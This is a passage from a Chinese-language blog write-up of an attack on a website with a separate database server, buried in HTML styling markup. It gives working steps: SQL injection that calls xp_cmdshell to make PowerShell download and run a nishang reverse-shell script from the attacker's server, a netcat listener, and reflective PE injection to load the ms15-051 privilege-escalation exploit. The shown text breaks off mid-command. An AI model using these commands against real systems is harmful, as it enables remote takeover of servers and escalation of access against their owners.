400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">看上去这个网站是站库分离的网站，用这种方法执行&nbsp;ping&nbsp;10.101.101.16&nbsp;，发现数据库服务器可以通外网，获取这些信息之后，我&nbsp;drop&nbsp;table&nbsp;temp&nbsp;删除创建的临时表。在获取到这么多信息了之后，在自己机子上开一个&nbsp;Web&nbsp;站点下载&nbsp;nishang&nbsp;的&nbsp;powershell&nbsp;的反弹脚本到自己的&nbsp;Web&nbsp;服务器上</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">nv&nbsp;-lvvp&nbsp;8888&nbsp;监听等待反弹，然后执行：</p><div id="crayon-5c25a60d4f795076672049" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 1680.8px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f795076672049-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">http</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//10.101.101.13/?page=1;exec&nbsp;master..xp_cmdshell&nbsp;&#39;powershell&nbsp;IEX&nbsp;(New-Object&nbsp;Net.WebClient).DownloadString(&#39;http://10.101.101.13/Invoke-PowerShellTcp.ps1&#39;);Invoke-PowerShellTcp&nbsp;-Reverse&nbsp;-IPAddress&nbsp;10.101.101.13&nbsp;-port&nbsp;8888&#39;;--</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;<br/>&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7ewohnc3j20ke0dndnm.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">但是数据库权限病不高，现在我将用&nbsp;Powershell&nbsp;远程加载并执行exe的脚本执行&nbsp;ms15-051&nbsp;，Ps&nbsp;脚本地址：</p><div id="crayon-5c25a60d4f79b533108184" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 828.8px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f79b533108184-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;"><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">https</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//github.com/clymb3r/PowerShell/blob/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1&nbsp;，</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">执行：</p><div id="crayon-5c25a60d4f7a0829990127" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 1458.4px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f7a0829990127-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">IEX</span>&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-r" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">New</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">Object</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Net</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">WebClient</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">DownloadString</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">&#39;http://10.101.101.13/Invoke-ReflectivePEInjection.ps1&#39;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; 